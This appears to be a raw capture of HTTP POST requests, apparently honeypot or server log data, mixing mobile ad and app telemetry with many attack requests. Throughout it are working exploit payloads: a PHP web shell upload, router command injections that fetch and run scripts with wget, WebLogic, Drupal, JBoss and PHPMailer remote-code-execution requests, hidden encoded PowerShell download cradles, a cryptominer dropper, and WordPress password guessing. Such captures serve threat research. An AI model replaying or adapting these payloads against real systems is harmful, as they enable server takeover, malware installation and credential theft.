Content-Type: multipart/form-data; boundary=(UploadBoundary)
Host: www.jamesatchue.com
Content-Length: 303
Connection: Close
--(UploadBoundary)
Content-Disposition: form-data; name="filename"; filename="07545460.php"
Content-Type: application/x-php
111111111111111111111111111111114955012931495501293<?php @eval($_POST['c']); die();?>
--(UploadBoundary)
Content-Disposition: form-data; name="1"
1
--(UploadBoundary)
POST /hndUnblock.cgi HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Length: 384
Content-Type: application/x-www-form-urlencoded
submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://t2.proxy-checks.com/favicon.ico HTTP/1.1
Host: t2.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST http://appinfocdn.ksmobile.net/gmi HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: appinfocdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 199
«ì≠Kb—ó;eò@YMp<%iÅ˝Yª?ffA0#]UAIeJD‰ßB‹ßejÅÓMúyíi∆(8x[lïAéG÷ŸpŸ0U¢±±U¨Œ§\e2.fYîœ)Ú }JüHì›˛^&nc˘s ı짩^ª.≈9÷I ’Ÿ P"µ⁄îr’´T*√îtflùÅËLXFÉ5¿îÊ1ë√Ó€}i$X9·X¯)P0—Ú-ô]À?6‹œwπÌp8√Õm`~§ìñ
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /command.php HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åt(ÛÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îgFY›∆√«∆fl
POST http://check.proxyradar.com/azenv.php?auth=149613307967&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E 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</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache
SvFZwYmbbYIKMU9uxlGdSEv8J48zkdbEQYwtQdc3GTb/a9o5wZzxclouuuf84NIsBiNl1AZ0UPDVFHdw9Bv1VkPR70nNNqBp3M1vfXX9gwbLbk9H2yBQCEvlSHSW55g0E7Zs/1tt5LvWDJ35h7V2bq+nSpbYIG/+38tUcDVElACCS8zJ80l65wVzpf1MTUTZ0NA2GC1fOG0aix3tsWWeCUXjjqJcNE6Z/TzF8BS5pM3l0uFT1APMx4SmVBLTEWuojdQUZQBZfS0O4lAGjVlln/IFkmwuvncPHHejCkupS8iJk5aPii7vemhhyiZNzkP4M2aujs06mXAH3oO3E3k7yt3OWke8Ox/sKdnKc+WDi4aES51tneJ9+KC75Q5PjTBoDPGM7VSBEx9/qcC4neb/axYw
POST http://check.proxyradar.com/azenv.php?auth=152809254035&a=PSCMN&i=759095603&p=3128 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /hndUnblock.cgi HTTP/1.1
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Length: 384
Content-Type: application/x-www-form-urlencoded
submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://alog.umengcloud.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496019302693
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umengcloud.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2363
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 24
Cache-Control: no-cache
log=jamesatchue&pwd=1qaz
POST http://check.proxyradar.com/azenv.php?auth=149549442507&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 420
Cache-Control: no-cache
EfNWl9nPMM8pNZ0uiQul0uRiwlvJEZcDo13yNh+i7lwCKU/aMCu1bXDZXuA4x4WcIWaEuw9YF8eImlMLP/3KzGoxdScpNKegTN/kjNuZky+BMjDugFzhTYluP1kc2KLGBDxJi5QQEg3lCsoxi/x0haPnXegUxRnPHU8du5TIa4h4tlbUbZeuPX/yo9/5y7vIX4uR1LrX7vYfUezMZGZ3mB6//xagEM8EFjQtvdcsaHyVI8s8MpdqOHJiPXIZzpPVbyDbXB3HF21EDTISsoSTdDMhxV7OGfcbl5YUR4SV0x5gIedxoeblk4JKs+808oL0Nw1y1vTbpMPGK8Bk0cuF2PlhBJpN/fzt66MTVHGxRvnrUi8NknaXifMGZ4mwThfsSm6K/b7KCbaw5iTr6U951WdziJ0x89/oYgq1
POST /cgi?7 HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
"Content-Type": text/plain
"Referer": 104.131.143.85/mainFrame.htm
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
POST http://cm.adkmob.com/getCatalog/?android_id=6ccc52a8048214f&cver=51424845&mcc=510&model=MI+4LTE&brand=Xiaomi&os_version=19&lan=in&country=id&ch=2010002546&resolution=1920x1080&k=1 HTTP/1.1
Content-Length: 128
Host: cm.adkmob.com
Connection: Keep-Alive
Äë,_—úãd®3OÎ÷'(B∏y∆Í£∞.`v±/fi∫∆äWHunIäúxnzeH åã(M”ı"√gÔáT@íÙ{ø≥ã?£±"X›»úAÔÕµƒ“©y∂‡f•é‹}∫ÿåìòé‘Ω:ı}πg’÷_˜Ωn¡>sA»Núfπ
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 169
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
_drupal_ajax=1&_drupal_ajax=1&form_id=user_register_form&mail%5B%23markup%5D=echo+Name%3A+%24%28id+-u+-n%29+&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1060
Content-Type: multipart/form-data; boundary=5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
27842
--5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
539ddd0c5e9289a16a4c86ccd9070cf0
--5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0--
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST /invoker/readonly HTTP/1.1
Accept: */*
Referer: http://x.x.x.x:8080/invoker/readonly
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Host: x.x.x.x:8080
Connection: Keep-Alive
POST http://gj.applog.uc.cn/collect?zip=gzip&pf=android&pn=com.uc.browser.en&ve=10.9.0&vc=104&sdk_ve=3.0.10&sdk_vc=212&sf=PVBusinessUnion&app=0652abada25c&uuid=15bf5ee0f45-af8795dc3d31775f&vno=1496455381548&chk=e3e2e39e HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: gj.applog.uc.cn
Transfer-Encoding: chunked
Content-Type: application/octet-stream
POST http://api.vungle.com/api/v4/sessionStart HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 106
{"start":1494931440511,"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST //wp-login.php?action=lostpassword HTTP/1.1
User-Agent: curl/7.35.0
Accept: */*
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}-o${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}69.64.61.196${substr{0}{1}{$spool_directory}}rce.txt}} null)
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
user_login=admin&wp-submit=Get+New+Password
POST http://check.proxyradar.com/azenv.php?auth=149622632759&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13
key=ONAI561AM
POST /jbossmq-httpil/HTTPServerILServlet HTTP/1.1
Host: x.x.x.x:7001
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Length: 1564
¨Ìsr2sun.reflect.annotation.AnnotationInvocationHandlerU ıÀ~•L memberValuestLjava/util/Map;LtypetLjava/lang/Class;xps}
java.util.Mapxrjava.lang.reflect.Proxy·'⁄ ÃCÀLht%Ljava/lang/reflect/InvocationHandler;xpsq~sr*org.apache.commons.collections.map.LazyMapnÂîÇûyîLfactoryt,Lorg/apache/commons/collections/Transformer;xpsr:org.apache.commons.collections.functors.ChainedTransformer0«óÏ(zó[
iTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;ΩV*Òÿ4ôxpsr;org.apache.commons.collections.functors.ConstantTransformerXvêA±îL iConstanttLjava/lang/Object;xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformeráˡk{|Œ8[iArgst[Ljava/lang/Object;L iMethodNametLjava/lang/String;[ iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;êŒXüs)lxpt
getRuntimeur[Ljava.lang.Class;´◊ÆÀÕZôxpt getMethoduq~vrjava.lang.String†§8z;≥Bxpvq~sq~uq~puq~tinvokeuq~vrjava.lang.Objectxpvq~sq~ur[Ljava.lang.String;≠“VÁÈ{GxptΩpowershell.exe -WindowStyle Hidden $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http://222.184.79.11:5317/minerxmr.exe', 'C:\\minerxmr.exe');START C:\\minerxmr.exetexecuq~q~#sq~srjava.lang.Integer‚†§˜Åá8Ivaluexrjava.lang.Numberܨï î‡ãxpsrjava.util.HashMap⁄¡√`—F
loadFactorI thresholdxp?@wxxvrjava.lang.Overridexpq~:
POST http://behacdn.ksmobile.net/fcl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 46
.ŒS·ŒÍÕ`i'c
K6ÍoòKÌVcpjBhC*8k‚·Hü¨{Ù’{
POST http://api.vungle.com/api/v4/requestAd HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 483
{"demo":{},"pubAppId":"5811c733a1e0773e1a000028","deviceInfo":{"dim":{"width":1080,"height":1920},"platform":"android","model":"Xiaomi,MI 4LTE","connection":"mobile","osVersion":"4.4.4","userAgent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 4LTE Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36","networkOperator":"TELKOMSEL","volume":0.4,"soundEnabled":false,"isSdCardAvailable":1},"ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST http://123.249.24.233/POST_ip_port.php HTTP/1.0
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache
QKdZwImcMaqDw3CJBsPEEj2cPDN/6B5MhGNggpTSNGprc+CKL4A3zWpOja/6ewMMqktK+P2A21i+ASKwjy4WT5zybyOpXi3RTOSkZipp7NUQWqdyK2aww+rrv9khXsoNBGewfpPGkafmf2MgUcxRim7dDfm8yyWz2Li4H6Nh1T2lSnRk4kfr3eaSW6A4gZ1NsqY+rDDN0uqd9Q3uSSSzdCUcEE+sj9jCA9BKpzbEuj4IhUmjyLzZtGJryZ40pUKBfkecQJs5a/CTr5gJZ0fqmwwb39G+51IcXT6clXqB7/wvk2xkC8MPRaTXaQPvQV5sFICQopu1rbfI66pRSW4zURPWjUh7shq/ePMFLoQ4ZCDFWIp6FFOeJ6jA4//VUhFisWVPH6MI
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 396
Cache-Control: no-cache
Ra0Nxd/NY4H0ZwiZktelL5OztaQeALYZ34SJrkDPvV0uZJxnG2SAmDcX+uDBu/FziMMdmQ0aN2iF26cYrZfL3fwkf1GckYeqmZHlyJiW4xeZHK67oRDwvWhbXS+YonqHRY43z5x0aLtx5zIewMFxUfOFVUkMcQYMHRmelr/jav07da+RHYbF/VIbHCf+WrrGBxaiblnDcm2xks6gp+NQksnmkAZngL8FOOqMi3VVvdaiLbuNadviJzU0RAwQwN7oRyMuxb0MxNAoifDkSIPotajZ8OIZNv145VcI6jLsQXv8H27gBf6h9gzCMUH8eXoBIg/8JaSNSiGWMBUQSP6EaaewcZkA+5hd1xvZiMACXECTiyfA6LIybsreJOl24DLRwTkYqMZuog==
POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 232
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=17&ac=50&pos=104280&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.native","des":"","sug":-1}]
POST http://check.proxyradar.com/azenv.php?auth=145906225033&a=PSCMN&i=1760126605&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwADEALgAyADAAMAAuADQANQAuADcAOAAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 16
Cache-Control: no-cache
log=172&pwd=test
POST http://check.proxyradar.com/azenv.php?auth=152342041059&a=PSCMN&i=1082776598&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
